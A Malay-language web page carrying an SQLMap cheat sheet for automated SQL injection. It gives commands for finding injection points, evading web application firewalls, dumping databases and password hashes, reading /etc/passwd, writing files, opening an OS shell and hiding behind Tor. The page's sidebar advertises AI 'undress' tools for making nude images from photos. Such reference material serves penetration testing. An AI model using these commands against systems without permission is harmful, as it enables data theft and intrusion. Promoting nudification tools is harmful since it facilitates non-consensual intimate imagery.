pembangunan bahagian belakang
Tutorial Python
Helaian Penipuan SQLMap: Panduan Pantas untuk Suntikan SQL Automatik
Helaian Penipuan SQLMap: Panduan Pantas untuk Suntikan SQL Automatik
Pengarang: Trix Cyrus
Apakah itu SQLMap?
SQLMap ialah alat ujian penembusan sumber terbuka yang digunakan untuk mengesan dan mengeksploitasi kelemahan suntikan SQL dalam aplikasi web. Ia menyokong pelbagai sistem pangkalan data seperti MySQL, PostgreSQL, Oracle, Microsoft SQL Server dan banyak lagi.
Penggunaan Asas
Untuk bermula dengan SQLMap, anda boleh menjalankannya dalam bentuk yang paling mudah dengan menyediakan URL sasaran:
sqlmap -u "http://example.com/index.php?id=1"
Arahan ini mengimbas URL sasaran untuk mencari kelemahan suntikan SQL.
1. Mengesan Kerentanan
Gunakan pilihan berikut untuk melakukan imbasan kelemahan asas dan mengesan titik suntikan SQL secara automatik:
sqlmap -u "http://example.com/index.php?id=1" --dbs
--dbs: Menyenaraikan semua pangkalan data yang tersedia pada pelayan sasaran jika kelemahan ditemui.
2. Menentukan Permintaan POST
Untuk sasaran yang memerlukan permintaan POST (biasanya dalam borang log masuk), anda boleh menentukan data seperti ini:
sqlmap -u "http://example.com/login.php" --data="username=admin&password=1234"
3. Memintas WAF dan Penapis
Untuk mengelak Tembok Api Aplikasi Web (WAF), SQLMap menyertakan teknik penyamaran muatan:
sqlmap -u "http://example.com/index.php?id=1" --tamper=space2comment
--tamper: Menggunakan skrip tamper untuk mengelak penapis. Contoh: space2comment, charencode.
4. Mengekstrak Pangkalan Data, Jadual dan Lajur
Untuk mendapatkan senarai pangkalan data pada sistem sasaran:
sqlmap -u "http://example.com/index.php?id=1" --dbs
Setelah pangkalan data dikenal pasti, ekstrak jadualnya:
sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables
Untuk mendapatkan lajur daripada jadual tertentu:
sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --columns
5. Lambakan Data
Melambakkan kandungan jadual ialah salah satu ciri SQLMap yang paling berguna. Contohnya, untuk membuang semua data daripada jadual tertentu:
sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump
6. Menghitung Pengguna dan Kata Laluan Pangkalan Data
SQLMap juga boleh digunakan untuk menghitung pengguna pangkalan data dan juga memecahkan kata laluan cincang:
sqlmap -u "http://example.com/index.php?id=1" --users sqlmap -u "http://example.com/index.php?id=1" --passwords
7. Mengakses Sistem Pengendalian
Dalam sesetengah kes, SQLMap boleh digunakan untuk melaksanakan arahan pada sistem pengendalian, terutamanya apabila pengguna pangkalan data mempunyai keistimewaan peringkat tinggi:
sqlmap -u "http://example.com/index.php?id=1" --os-shell
Ini akan menyediakan shell interaktif di mana anda boleh melaksanakan arahan pada sistem sasaran.
8. Muat Naik Fail dan Bacaan
Anda juga boleh membaca fail daripada sistem sasaran atau memuat naik fail berniat jahat (jika dibenarkan):
sqlmap -u "http://example.com/index.php?id=1" --file-read="/etc/passwd" sqlmap -u "http://example.com/index.php?id=1" --file-write="/path/to/file" --file-dest="/destination/path"
9. Menggunakan Tor untuk Tanpa Nama
Untuk menyembunyikan identiti anda, anda boleh menjalankan SQLMap melalui rangkaian Tor:
sqlmap -u "http://example.com/index.php?id=1" --tor --tor-type=SOCKS5 --check-tor
--tor: Mendayakan Tor.
--check-tor: Mengesahkan jika sambungan dibuat melalui Tor.
10. Menyimpan dan Menyambung Semula
SQLMap membolehkan anda menyimpan dan menyambung semula kemajuan anda dengan menggunakan pilihan --session:
sqlmap -u "http://example.com/index.php?id=1" --session=your_session_name
Kemudian, anda boleh menyambung semula sesi yang sama dengan:
sqlmap -r your_session_name
11. Mod Verbose
Untuk melihat maklumat terperinci tentang perkara yang dilakukan oleh SQLMap:
sqlmap -u "http://example.com/index.php?id=1" -v 3
Pilihan -v mengawal verbositi (tahap dari 0 hingga 6, dengan 6 menunjukkan semua butiran).
- Imbasan Automatik untuk Berbilang Sasaran
SQLMap menyokong mengimbas berbilang URL yang disimpan dalam fail:
sqlmap -m urls.txt --batch
--batch: Jawab semua gesaan secara automatik dengan pilihan lalai, berguna untuk pengimbasan automatik.
juga gunakan --risk=3 dan --level=5 untuk memajukan pengimbasan
Anda boleh menggunakan helaian cheat ini untuk memperkenalkan pembaca kepada arahan penting SQLMap dan membantu mereka bermula dengan ujian suntikan SQL.
~TrixSec
Atas ialah kandungan terperinci Helaian Penipuan SQLMap: Panduan Pantas untuk Suntikan SQL Automatik. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!
Alat AI Hot
Undresser.AI Undress
Apl berkuasa AI untuk mencipta foto bogel yang realistik
AI Clothes Remover
Alat AI dalam talian untuk mengeluarkan pakaian daripada foto.
Undress AI Tool
Gambar buka pakaian secara percuma
Clothoff.io
Penyingkiran pakaian AI
Video Face Swap
Tukar muka dalam mana-mana video dengan mudah menggunakan alat tukar muka AI percuma kami!
Artikel Panas
Alat panas
Notepad++7.3.1
Editor kod yang mudah digunakan dan percuma
SublimeText3 versi Cina
Versi Cina, sangat mudah digunakan
Hantar Studio 13.0.1
Persekitaran pembangunan bersepadu PHP yang berkuasa
Dreamweaver CS6
Alat pembangunan web visual
SublimeText3 versi Mac
Perisian penyuntingan kod peringkat Tuhan (SublimeText3)
Topik panas
1671
14
1428
52
1331
25
1276
29
1256
24
Python vs C: Lengkung pembelajaran dan kemudahan penggunaan
Apr 19, 2025 am 12:20 AM
Python lebih mudah dipelajari dan digunakan, manakala C lebih kuat tetapi kompleks. 1. Sintaks Python adalah ringkas dan sesuai untuk pemula. Penaipan dinamik dan pengurusan memori automatik menjadikannya mudah digunakan, tetapi boleh menyebabkan kesilapan runtime. 2.C menyediakan kawalan peringkat rendah dan ciri-ciri canggih, sesuai untuk aplikasi berprestasi tinggi, tetapi mempunyai ambang pembelajaran yang tinggi dan memerlukan memori manual dan pengurusan keselamatan jenis.
Python dan Masa: Memanfaatkan masa belajar anda
Apr 14, 2025 am 12:02 AM
Untuk memaksimumkan kecekapan pembelajaran Python dalam masa yang terhad, anda boleh menggunakan modul, masa, dan modul Python. 1. Modul DateTime digunakan untuk merakam dan merancang masa pembelajaran. 2. Modul Masa membantu menetapkan kajian dan masa rehat. 3. Modul Jadual secara automatik mengatur tugas pembelajaran mingguan.
Python vs C: Meneroka Prestasi dan Kecekapan
Apr 18, 2025 am 12:20 AM
Python lebih baik daripada C dalam kecekapan pembangunan, tetapi C lebih tinggi dalam prestasi pelaksanaan. 1. Sintaks ringkas Python dan perpustakaan yang kaya meningkatkan kecekapan pembangunan. 2. Ciri-ciri jenis kompilasi dan kawalan perkakasan meningkatkan prestasi pelaksanaan. Apabila membuat pilihan, anda perlu menimbang kelajuan pembangunan dan kecekapan pelaksanaan berdasarkan keperluan projek.
Pembelajaran Python: Adakah 2 jam kajian harian mencukupi?
Apr 18, 2025 am 12:22 AM
Adakah cukup untuk belajar Python selama dua jam sehari? Ia bergantung pada matlamat dan kaedah pembelajaran anda. 1) Membangunkan pelan pembelajaran yang jelas, 2) Pilih sumber dan kaedah pembelajaran yang sesuai, 3) mengamalkan dan mengkaji semula dan menyatukan amalan tangan dan mengkaji semula dan menyatukan, dan anda secara beransur-ansur boleh menguasai pengetahuan asas dan fungsi lanjutan Python dalam tempoh ini.
Python vs C: Memahami perbezaan utama
Apr 21, 2025 am 12:18 AM
Python dan C masing -masing mempunyai kelebihan sendiri, dan pilihannya harus berdasarkan keperluan projek. 1) Python sesuai untuk pembangunan pesat dan pemprosesan data kerana sintaks ringkas dan menaip dinamik. 2) C sesuai untuk prestasi tinggi dan pengaturcaraan sistem kerana menaip statik dan pengurusan memori manual.
Yang merupakan sebahagian daripada Perpustakaan Standard Python: Senarai atau Array?
Apr 27, 2025 am 12:03 AM
Pythonlistsarepartofthestandardlibrary, sementara
Python: Automasi, skrip, dan pengurusan tugas
Apr 16, 2025 am 12:14 AM
Python cemerlang dalam automasi, skrip, dan pengurusan tugas. 1) Automasi: Sandaran fail direalisasikan melalui perpustakaan standard seperti OS dan Shutil. 2) Penulisan Skrip: Gunakan Perpustakaan Psutil untuk memantau sumber sistem. 3) Pengurusan Tugas: Gunakan perpustakaan jadual untuk menjadualkan tugas. Kemudahan penggunaan Python dan sokongan perpustakaan yang kaya menjadikannya alat pilihan di kawasan ini.
Python untuk pengkomputeran saintifik: rupa terperinci
Apr 19, 2025 am 12:15 AM
Aplikasi Python dalam pengkomputeran saintifik termasuk analisis data, pembelajaran mesin, simulasi berangka dan visualisasi. 1.Numpy menyediakan susunan pelbagai dimensi yang cekap dan fungsi matematik. 2. Scipy memanjangkan fungsi numpy dan menyediakan pengoptimuman dan alat algebra linear. 3. Pandas digunakan untuk pemprosesan dan analisis data. 4.Matplotlib digunakan untuk menghasilkan pelbagai graf dan hasil visual.
